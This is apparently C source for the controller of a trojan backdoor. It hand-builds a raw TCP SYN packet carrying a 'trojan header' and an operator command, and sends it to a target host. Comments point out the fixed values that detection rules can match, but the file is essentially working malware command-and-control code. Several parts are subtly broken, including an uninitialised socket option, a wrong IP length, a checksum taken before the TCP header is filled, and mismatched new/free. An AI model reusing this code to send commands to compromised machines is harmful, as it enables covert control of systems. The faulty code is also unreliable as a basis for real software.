#include "mysock.h"
#include <WS2TCPIP.H>
#define MAX_PACKET_SIZE 65536     // size of the on-stack build buffer in main()
#define SEQ_IDENTITY 12345        // fixed value main() writes (via htons) into the TCP sequence field
#define TROJAN_ID_IDENTITY 6789   // fixed value main() writes (via htons) into TROJANHEADER.trojan_id
#define SERVER_PORT 80            // TCP destination port of every packet sent
#define LOCAL_PORT 1234           // TCP source port of every packet sent
// The four protocol constants are compiled in and never vary, so the traffic
// this client produces is straightforward to match in a network detection rule.
//trojan packet header
// Application-layer header that main() places directly after the TCP header.
// No packing directive is visible in this file (mysock.h is not shown), so the
// on-the-wire size is whatever sizeof(TROJANHEADER) evaluates to here.
typedef struct trojanhdr
{
    unsigned long trojan_id;    // marker field; main() stores htons(TROJAN_ID_IDENTITY) here
    unsigned short trojan_len;  // byte length of the command that follows; main() stores cmdlen unconverted
}TROJANHEADER, *PTROJANHEADER;
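//calculate checksum
/*
 * RFC 1071 Internet checksum: one's-complement sum of 16-bit words, with a
 * trailing odd byte added as a single octet, folded to 16 bits and
 * complemented. main() uses it for both the IP header checksum and the
 * TCP (pseudo-header + segment) checksum.
 *
 * buffer: bytes to sum; read as host-order 16-bit words through memcpy, so
 *         the caller's buffer needs no particular alignment and the access
 *         does not rely on type punning.
 * size:   byte length of the data. A zero or negative size sums nothing and
 *         returns 0xFFFF instead of reading a byte past the caller's data.
 * returns the 16-bit checksum (0xFFFF for empty or all-zero input).
 */
unsigned short checksum(unsigned short * buffer, int size)
{
    unsigned long cksum = 0;
    const unsigned char *p = (const unsigned char *)buffer;

    // A negative size would skip the loop and fall straight into the
    // odd-byte read below; treat it as "nothing to sum".
    if (size < 0)
    {
        size = 0;
    }
    while (size > 1)
    {
        unsigned short word;
        memcpy(&word, p, sizeof word);   // host-order word, alignment-safe
        cksum += word;
        p += sizeof word;
        size -= (int)sizeof word;
    }
    if (size)
    {
        cksum += *p;                     // trailing odd byte counts as one octet
    }
    // Fold the carries back into the low 16 bits (twice: the first fold can
    // itself produce a carry).
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (unsigned short)(~cksum);
}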
//get local ip
/*
 * Resolves this machine's own host name and returns one of its addresses as
 * a 32-bit value in the form inet_addr() produces (network byte order).
 * Every entry of h_addr_list is formatted into the same string, so the entry
 * that survives is the last one in the list; the first four bytes of each
 * entry are printed as a dotted quad regardless of h_addrtype.
 *
 * returns 0 when gethostname() fails; when the name resolves to no address
 *         the formatted string stays empty and whatever inet_addr("")
 *         yields is returned unchanged.
 */
unsigned long GetLocalIP()
{
    char szHostName[128 + 1] = "\0";
    if (gethostname(szHostName, 128) != 0)
    {
        return 0;
    }

    char szLocalIP[20] = {0};
    hostent *phe = gethostbyname(szHostName);
    if (phe != NULL)
    {
        // Walk the NULL-terminated address list; each pass overwrites the
        // string, so the last address wins.
        for (char **entry = phe->h_addr_list; *entry != NULL; ++entry)
        {
            const UCHAR *octets = (const UCHAR *)*entry;
            sprintf(szLocalIP, "%d.%d.%d.%d",
                    (UINT)octets[0],
                    (UINT)octets[1],
                    (UINT)octets[2],
                    (UINT)octets[3]);
        }
    }
    return inet_addr(szLocalIP);
}
/*
 * Entry point. Builds one IPv4/TCP packet by hand and sends it to argv[1]
 * through a raw socket; after the TCP header the packet carries a
 * TROJANHEADER followed by the command string argv[2].
 *
 * Everything below is fixed at compile time, which is what network
 * monitoring can key on: a SYN segment that carries a payload, source port
 * LOCAL_PORT, destination port SERVER_PORT, sequence field
 * htons(SEQ_IDENTITY), ack 345678, TTL 128, window 512, and a payload header
 * beginning with htons(TROJAN_ID_IDENTITY). Sending needs a raw socket with
 * IP_HDRINCL, which on Windows requires an administrative account; current
 * Windows releases are documented as refusing TCP segments over raw sockets,
 * so on those systems this path is expected to end in the sendto error
 * branch (not verified here).
 *
 * argv[1]: destination IP as a dotted quad, parsed with inet_addr() (the
 *          result is not checked).
 * argv[2]: command string, copied verbatim into the payload.
 * returns -1 on bad usage or Winsock/socket setup failure; 0 after the send
 *         attempt whether or not sendto() succeeded (a failure is only
 *         printed).
 */
int main(int argc, char* argv[])
{
    int cmdlen;
    char szDataBuf[MAX_PACKET_SIZE] = {0};   // scratch area: first checksum input, then the packet itself
    BOOL bOption;
    WSADATA WSAData;
    SOCKET nSock;
    SOCKADDR_IN addr_in;
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;                      // TCP pseudo-header, used only as checksum input
    TROJANHEADER trojanHeader;
    if (argc != 3)
    {
        printf("usage: %s targetip command",argv[0]);
        return -1;
    }
    //copy the command string that will be sent: NUL-padded heap copy,
    //cmdlen is its length without the terminator
    cmdlen = strlen(argv[2]);
    char * pCommand = new char[cmdlen + 2];
    memset(pCommand, 0, cmdlen + 2);
    memcpy(pCommand, argv[2], cmdlen);
    if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
    {
        printf("wsastartup error : %d\n", WSAGetLastError());
        return -1;
    }
    //raw IP socket: with IP_HDRINCL (set below) the program supplies the IP
    //header itself instead of letting the stack build it
    nSock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (INVALID_SOCKET == nSock)
    {
        printf("socket error : %d\n", WSAGetLastError());
        free(pCommand);
        closesocket(nSock);
        WSACleanup();
        return -1;
    }
    int nRet = setsockopt(nSock, IPPROTO_IP, IP_HDRINCL, (char*)&bOption, sizeof(bOption));
    if (SOCKET_ERROR == nRet)
    {
        printf("setsockopt error : %d\n", WSAGetLastError());
        free(pCommand);
        closesocket(nSock);
        WSACleanup();
        return -1;
    }
    //fill in ip header
    ipHeader.ver_and_len = (4 << 4) | (sizeof(IPHEADER) / sizeof(unsigned long)); // version 4, IHL in 32-bit words
    ipHeader.tos = 0;
    ipHeader.total_len = htons(sizeof(IPHEADER) + sizeof(TCPHEADER));            // total length, network byte order
    ipHeader.ident = 0;
    ipHeader.frag_and_flags = 0;
    ipHeader.ttl = 128;
    ipHeader.proto = IPPROTO_TCP;
    ipHeader.checksum = 0;                                                       // must be zero while the checksum is computed
    ipHeader.sourceip = GetLocalIP();                                            // source address from this host's own address list
    ipHeader.destinationip = inet_addr(argv[1]);
    //IP header checksum over the IP + TCP header area of the buffer as it
    //stands at this point
    memcpy(szDataBuf, &ipHeader, sizeof(IPHEADER));
    memcpy(szDataBuf + sizeof(IPHEADER), &tcpHeader, sizeof(TCPHEADER));
    memset(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER), 0, 4);
    ipHeader.checksum = checksum((unsigned short *)szDataBuf, sizeof(IPHEADER) + sizeof(TCPHEADER));
    //fill in tcp header: every value is a constant, see the header comment
    tcpHeader.sourceport = htons(LOCAL_PORT); //make no difference
    tcpHeader.destinationport = htons(SERVER_PORT); //make no difference
    tcpHeader.seq = htons(SEQ_IDENTITY); //fixed marker in the sequence field
    tcpHeader.ack = 345678;
    tcpHeader.len_res_flag = (sizeof(TCPHEADER)/4 << 12) | (0 << 6) | SYN; //data offset in the top 4 bits, SYN flag set
    tcpHeader.windowsize = 512;
    tcpHeader.urgenpointer = 0;
    tcpHeader.checksum = 0;                                                 //zero while the TCP checksum is computed
    //fill in trojan header
    trojanHeader.trojan_id = htons(TROJAN_ID_IDENTITY);                     //fixed marker at the start of the payload
    trojanHeader.trojan_len = cmdlen;                                       //host byte order, no conversion
    //fill in psd header (use for calculate checksum)
    psdHeader.sourceip = ipHeader.sourceip;
    psdHeader.destinationip = ipHeader.destinationip;
    psdHeader.mbz = 0;
    psdHeader.proto = IPPROTO_TCP;
    psdHeader.tcp_len = htons(sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen); //TCP header + payload length
    //calculate checksum: pseudo-header, TCP header, trojan header and command
    //are laid out contiguously in the scratch buffer and summed together
    memcpy(szDataBuf, &psdHeader, sizeof(PSDHEADER));
    memcpy(szDataBuf + sizeof(PSDHEADER), &tcpHeader, sizeof(TCPHEADER));
    memcpy(szDataBuf + sizeof(PSDHEADER) + sizeof(TCPHEADER), &trojanHeader, sizeof(TROJANHEADER));
    memcpy(szDataBuf + sizeof(PSDHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), pCommand, cmdlen);
    tcpHeader.checksum = checksum((unsigned short *)szDataBuf, sizeof(PSDHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen);
    int total_len = sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen;
    memset(szDataBuf, 0, total_len);
    //fill in the buffer to send: IP header, TCP header, trojan header, command
    memcpy(szDataBuf, &ipHeader, sizeof(IPHEADER));
    memcpy(szDataBuf + sizeof(IPHEADER), &tcpHeader, sizeof(TCPHEADER));
    memcpy(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER), &trojanHeader, sizeof(TROJANHEADER));
    memcpy(szDataBuf + sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), pCommand, cmdlen);
    //destination for sendto(); the IP header in the buffer already names it too
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(SERVER_PORT);
    addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
    //send a command
    printf("Start to send command...\n");
    nRet = sendto(nSock,
                  szDataBuf,
                  sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER) + cmdlen,
                  0,
                  (struct sockaddr*)&addr_in,
                  sizeof(addr_in));
    if (SOCKET_ERROR == nRet)
    {
        printf("sendto error : %d\n", WSAGetLastError());
    }
    else
        printf("Send OK!\n");
    free(pCommand);
    closesocket(nSock);
    WSACleanup();
    return 0;
}